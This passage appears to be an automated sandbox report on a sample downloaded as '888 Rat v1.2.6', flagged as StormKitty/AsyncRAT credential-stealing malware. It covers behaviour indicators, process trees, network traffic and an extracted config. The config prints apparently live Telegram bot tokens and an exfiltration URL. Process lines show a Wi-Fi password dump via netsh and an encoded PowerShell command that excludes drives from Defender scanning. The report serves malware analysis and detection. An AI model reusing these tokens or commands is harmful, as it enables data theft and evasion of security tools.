  - SetupTCPDriver.exe (PID: 3556)
  - cmd.exe (PID: 1652)
  - cmd.exe (PID: 3744)
- Reads settings of System Certificates
  - SetupTCPDriver.exe (PID: 3556)
  - Bubbles.scr (PID: 448)
- Drops 7-zip archiver for unpacking
  - SetupTCPDriver.exe (PID: 3556)
- Detected use of alternative data streams (AltDS)
  - SetupTCPDriver.exe (PID: 3556)
  - Helper.exe (PID: 2032)
- Using PowerShell to operate with local accounts
  - powershell.exe (PID: 1544)
- Starts CMD.EXE for commands execution
  - SetupTCPDriver.exe (PID: 3556)
  - Bubbles.scr (PID: 448)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 3352)
- Reads browser cookies
  - Bubbles.scr (PID: 448)
- Uses NETSH.EXE to obtain data on the network
  - cmd.exe (PID: 1652)
  - cmd.exe (PID: 3744)
- Using 'findstr.exe' to search for text patterns in files and output
  - cmd.exe (PID: 1652)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - Bubbles.scr (PID: 448)
- The process executes via Task Scheduler
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3600)
- Application launched itself
  - Helper.exe (PID: 2032)
- Adds/modifies Windows certificates
  - SetupTCPDriver.exe (PID: 3556)
- Write to the desktop.ini file (may be used to cloak folders)
  - Bubbles.scr (PID: 448)
- Connects to unusual port
  - tor.exe (PID: 3888)
- Checks for external IP
  - Bubbles.scr (PID: 448)
INFO
- Checks supported languages
  - 888 Rat v1.2.6.exe (PID: 844)
  - SetupTCPDriver.exe (PID: 3556)
  - Bubbles.scr (PID: 448)
  - 888 Builder.exe (PID: 1840)
  - CL_Debug_Log.txt (PID: 2424)
  - chcp.com (PID: 2416)
  - chcp.com (PID: 3108)
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3600)
  - Helper.exe (PID: 3060)
  - tor.exe (PID: 3888)
  - flagx.exe (PID: 2916)
  - Helper.exe (PID: 3348)
- Reads the computer name
  - 888 Rat v1.2.6.exe (PID: 844)
  - Bubbles.scr (PID: 448)
  - SetupTCPDriver.exe (PID: 3556)
  - CL_Debug_Log.txt (PID: 2424)
  - 888 Builder.exe (PID: 1840)
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3060)
  - tor.exe (PID: 3888)
  - flagx.exe (PID: 2916)
  - Helper.exe (PID: 3348)
- Application launched itself
  - iexplore.exe (PID: 2124)
- Modifies the phishing filter of IE
  - iexplore.exe (PID: 2124)
- The process uses the downloaded file
  - WinRAR.exe (PID: 2504)
  - iexplore.exe (PID: 2124)
- Create files in a temporary directory
  - 888 Rat v1.2.6.exe (PID: 844)
  - SetupTCPDriver.exe (PID: 3556)
  - 888 Builder.exe (PID: 1840)
  - flagx.exe (PID: 2916)
  - CL_Debug_Log.txt (PID: 2424)
  - Bubbles.scr (PID: 448)
- Reads mouse settings
  - SetupTCPDriver.exe (PID: 3556)
  - 888 Builder.exe (PID: 1840)
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3600)
- Reads the machine GUID from the registry
  - Bubbles.scr (PID: 448)
  - SetupTCPDriver.exe (PID: 3556)
  - 888 Builder.exe (PID: 1840)
  - Helper.exe (PID: 2032)
  - tor.exe (PID: 3888)
- Reads Environment values
  - Bubbles.scr (PID: 448)
- Reads the software policy settings
  - SetupTCPDriver.exe (PID: 3556)
  - Bubbles.scr (PID: 448)
- Creates files or folders in the user directory
  - SetupTCPDriver.exe (PID: 3556)
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3060)
  - Bubbles.scr (PID: 448)
  - tor.exe (PID: 3888)
- Reads CPU info
  - Bubbles.scr (PID: 448)
- The dropped object may contain a URL to Tor Browser
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3060)
- Dropped object may contain TOR URL's
  - Helper.exe (PID: 2032)
  - Helper.exe (PID: 3060)
- Checks proxy server information
  - 888 Builder.exe (PID: 1840)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

StormKitty

(PID) Process(448) Bubbles.scr

C2 (1)127.0.0.1

Ports (3)6606

7707

8808

Credentials

Protocoltelegram

URLhttps://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/send

Token5393393816:AAEAXp-5zN1DxlsNGsPhc99RWe99d19vZ3I

ChatId-1001523505230

BotnetDefault

Options

AutoRunfalse

MutexAsyncMutex_6SI8OkPnk

InstallFolder%AppData%

BSoDfalse

AntiVMfalse

Certificates

Cert1MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OB...

Server_SignatureJ7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3...

Keys

AESe5e3972eba013063607e705973dfdf80a8555bcfd8fe09651da2ab43b5773d9b

Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

448

"C:\Windows\Bubbles.scr" /S

C:\Windows\Bubbles.scr

888 Rat v1.2.6.exe

User:

admin

Integrity Level:

HIGH

Description:

Client

Version:

1.0.0.0

Modules

Images
c:\windows\bubbles.scr
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll

StormKitty

(PID) Process(448) Bubbles.scr

C2 (1)127.0.0.1

Ports (3)6606

7707

8808

Credentials

Protocoltelegram

URLhttps://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/send

Token5393393816:AAEAXp-5zN1DxlsNGsPhc99RWe99d19vZ3I

ChatId-1001523505230

BotnetDefault

Options

AutoRunfalse

MutexAsyncMutex_6SI8OkPnk

InstallFolder%AppData%

BSoDfalse

AntiVMfalse

Certificates

Keys

AESe5e3972eba013063607e705973dfdf80a8555bcfd8fe09651da2ab43b5773d9b

Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941

844

"C:\Users\admin\AppData\Local\Temp\Rar$EXa2504.27943\888 Rat v1.2.6.exe"

C:\Users\admin\AppData\Local\Temp\Rar$EXa2504.27943\888 Rat v1.2.6.exe

WinRAR.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\rar$exa2504.27943\888 rat v1.2.6.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll

896

netsh wlan show profile

C:\Windows\System32\netsh.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Network Command Shell

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll

1544

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAagBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAagBkACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

888 Rat v1.2.6.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

1652

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\System32\cmd.exe

—

Bubbles.scr

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

1820

timeout /t 0

C:\Windows\System32\timeout.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

timeout - pauses command processing

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll

1840

"C:\Users\admin\AppData\Local\Temp\888 Builder.exe"

C:\Users\admin\AppData\Local\Temp\888 Builder.exe

888 Rat v1.2.6.exe

User:

admin

Integrity Level:

HIGH

Exit code:

3221225547

Modules

Images
c:\users\admin\appdata\local\temp\888 builder.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll

2032

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Helper.exe

taskeng.exe

User:

admin

Integrity Level:

MEDIUM

Modules

Images
c:\users\admin\appdata\roaming\microsoft\windows\helper.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll

2080

netsh wlan show networks mode=bssid

C:\Windows\System32\netsh.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Network Command Shell

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll

2124

"C:\Program Files\Internet Explorer\iexplore.exe" "https://www.upload.ee/files/15529307/888_Rat_v1.2.6.zip.html"

C:\Program Files\Internet Explorer\iexplore.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Internet Explorer

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll

Add for printing

Total events

51 618

Read events

51 203

Write events

367

Delete events

Modification events


(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:	write	Name:	NTPDaysSinceLastAutoMigration
Value: 1
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:	write	Name:	NTPLastLaunchLowDateTime
Value:
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:	write	Name:	NTPLastLaunchHighDateTime
Value: 31096143
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:	write	Name:	NextCheckForUpdateLowDateTime
Value:
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:	write	Name:	NextCheckForUpdateHighDateTime
Value: 31096143
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:	write	Name:	CompatibilityFlags
Value: 0
(PID) Process:	(2124) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1

Add for printing

Executable files

Suspicious files

Text files

494

Unknown types

123

Dropped files

PID	Process	Filename		Type
2856	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\ubr__style[1].css		text
		MD5:7B9692D4CAECCCF38E40D2333F8E00B0	SHA256:C4042306388924B75AA7D584C1E61165264967A52D09544ECBA836F0D00EB9B9
2856	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\14561BF7422BB6F70A9CB14F5AA8A7DA_582DC597430784041BB93D3718D1C412		binary
		MD5:63367A0EA158FE0C71C9C4B85CF3163E	SHA256:2A4F6A4740D580DE7919CE4C57B295C04F1357D339FD798ECA7E6F379D15001D
2856	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\js__file_upload[1].js		text
		MD5:66684709338F7239056FF3302E16BC4A	SHA256:5163E50A8FE4549A8CA064E266DE9C8E6AEBD1D848185E0931959824A4D32C0F
2856	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_23FFFDCAABB8E63694AD1202ED02BF57		binary
		MD5:E58D69C8560519E99356DA1DF1036C42	SHA256:D1E1CE38F220893CBC070EC3ED94EACF546C1F5A9FF1F1D0F4AD1356C03879A0
2856	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\888_Rat_v1.2.6.zip[1].htm		html
		MD5:22142E08758D52B1097A2E71EE8A0EF1	SHA256:B30AA42DC2ECEE5FBFC829BDED7C17E6B1BCB0E96AA8D1637549FDB0FD2477F0
2856	iexplore.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\62RRP814.txt		text
		MD5:0AF7C5D5B3E0827DD123B11026D6EF72	SHA256:5C5AF6F664DF405DAC9473B7396FBFD1F42E1B1841EE461060356122352DE736
2856	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62		binary
		MD5:9C347BEA7CC577EBC3B0707CC1FA262E	SHA256:702BF21F57FEB6D1A0E7F16509F61271CE1D99B1874C940F10D96C7CCE74D59D
2856	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04		binary
		MD5:F93CC3F7BDB370A0D2D248EA6C6F4B1D	SHA256:AC74F045858ECC235DC541A0C988070C0F2DCF54DF88F1AC9F8F567BFBF3EF26
2856	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\dl_[1].png		image
		MD5:F3E8F284A4E98CDB91B6ABFC142D94A4	SHA256:2F13919383F54CA21E5B87F5644DF8A875B99815C821DCBBABEA352D854C6882
2856	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA		binary
		MD5:2852C388E499E79993FFD4E5E3688077	SHA256:D4293558313FB74D73D58A7C65D9D69AB8AD9E5A2CAF3A6D12C73BA52B576173

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2856	iexplore.exe	GET	304	184.24.77.186:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4a9ffd2bb8e04402	unknown	—	—	unknown
2856	iexplore.exe	GET	304	184.24.77.202:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a08f35fbea17b647	unknown	—	—	unknown
2856	iexplore.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAoFmyX1Sz2HlMxmMUd1OKM%3D	unknown	binary	471 b	unknown
2856	iexplore.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQlOydjtpho0%2Bholo77zGjGxETUEQQU8JyF%2FaKffY%2FJaLvV1IlNHb7TkP8CEAHqRFnqJyQkmYqUpX34D7k%3D	unknown	binary	727 b	unknown
2856	iexplore.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D	unknown	binary	471 b	unknown
2856	iexplore.exe	GET	200	108.138.2.173:80	http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D	unknown	binary	2.02 Kb	unknown
2856	iexplore.exe	GET	200	142.250.181.227:80	http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D	unknown	binary	1.41 Kb	unknown
2856	iexplore.exe	GET	200	142.250.181.227:80	http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D	unknown	binary	724 b	unknown
2856	iexplore.exe	GET	200	18.245.39.64:80	http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D	unknown	binary	1.49 Kb	unknown
2856	iexplore.exe	GET	200	142.250.181.227:80	http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQD6BeWhIbleexId20FpK0af	unknown	binary	472 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
1080	svchost.exe	224.0.0.252:5355	—	—	—	unknown
4	System	192.168.100.255:138	—	—	—	whitelisted
2856	iexplore.exe	51.91.30.159:443	www.upload.ee	OVH SAS	FR	unknown
2856	iexplore.exe	184.24.77.186:80	ctldl.windowsupdate.com	Akamai International B.V.	DE	unknown
2856	iexplore.exe	184.24.77.202:80	ctldl.windowsupdate.com	Akamai International B.V.	DE	unknown
2856	iexplore.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
2856	iexplore.exe	143.204.205.91:443	du0pud0sdlmzf.cloudfront.net	AMAZON-02	US	unknown
2856	iexplore.exe	142.250.185.72:443	www.googletagmanager.com	GOOGLE	US	unknown
2856	iexplore.exe	142.250.186.98:443	pagead2.googlesyndication.com	GOOGLE	US	unknown

DNS requests

Domain	IP	Reputation
www.upload.ee	51.91.30.159	whitelisted
ctldl.windowsupdate.com	184.24.77.202 184.24.77.186 184.24.77.193	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
s7.addthis.com	23.45.238.53	whitelisted
www.googletagmanager.com	142.250.185.72	whitelisted
du0pud0sdlmzf.cloudfront.net	143.204.205.91 143.204.205.67 143.204.205.52 143.204.205.78	unknown
pagead2.googlesyndication.com	142.250.186.98	whitelisted
o.ss2.us	108.138.2.173 108.138.2.107 108.138.2.10 108.138.2.195	whitelisted
ocsp.pki.goog	142.250.181.227	whitelisted
ocsp.rootg2.amazontrust.com	18.245.39.64	whitelisted

Threats

PID	Process	Class	Message
3556	SetupTCPDriver.exe	Potential Corporate Privacy Violation	ET POLICY IP Logger Redirect Domain in SNI
448	Bubbles.scr	Potential Corporate Privacy Violation	ET POLICY Observed Wifi Geolocation Domain (api .mylnikov .org in TLS SNI)
448	Bubbles.scr	Attempted Information Leak	ET POLICY IP Check Domain (icanhazip. com in HTTP Host)
448	Bubbles.scr	Device Retrieving External IP Address Detected	SUSPICIOUS [ANY.RUN] Received IP address from server as result of HTTP request
1080	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
448	Bubbles.scr	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
448	Bubbles.scr	Misc activity	ET HUNTING Telegram API Certificate Observed
448	Bubbles.scr	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
—	—	Misc activity	ET HUNTING Telegram API Certificate Observed
—	—	Successful Credential Theft Detected	STEALER [ANY.RUN] Attempt to exfiltrate via Telegram

Add for printing

No debug info

General Info

https://www.upload.ee/files/15529307/888_Rat_v1.2.6.zip.html

51707C50B7EB2BEB2E72693DDD346C3B

49B70FCB57760927E8620F27B4C25F4279F763C9

68C33DDDE32A755599A37F2C081C77CA248F0859B120DB7E9253BF5B46CEFE08

3:N8DSLr7MJmUFXVJRJEKn:2OLr0RnkKn

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Drops the executable file immediately after the start

Steals credentials

Steals credentials from Web Browsers

STORMKITTY has been detected (YARA)

ASYNCRAT has been detected (MUTEX)

Actions looks like stealing of personal data

SUSPICIOUS

Reads security settings of Internet Explorer

Starts POWERSHELL.EXE for commands execution

Reads the Internet Settings

Base64-obfuscated command line is found

BASE64 encoded PowerShell command has been detected

Executable content was dropped or overwritten

Starts application with an unusual extension

Reads settings of System Certificates

Drops 7-zip archiver for unpacking

Detected use of alternative data streams (AltDS)

Using PowerShell to operate with local accounts

Starts CMD.EXE for commands execution

Uses TIMEOUT.EXE to delay execution

Reads browser cookies

Uses NETSH.EXE to obtain data on the network

Using 'findstr.exe' to search for text patterns in files and output

Process communicates with Telegram (possibly using it as an attacker's C2 server)

The process executes via Task Scheduler

Application launched itself

Adds/modifies Windows certificates

Write to the desktop.ini file (may be used to cloak folders)

Connects to unusual port

Checks for external IP

INFO

Checks supported languages

Reads the computer name

Application launched itself

Modifies the phishing filter of IE

The process uses the downloaded file

Create files in a temporary directory

Reads mouse settings

Reads the machine GUID from the registry

Reads Environment values

Reads the software policy settings

Creates files or folders in the user directory

Reads CPU info

The dropped object may contain a URL to Tor Browser

Dropped object may contain TOR URL's

Checks proxy server information

Malware configuration

StormKitty

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Malware configuration

StormKitty

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information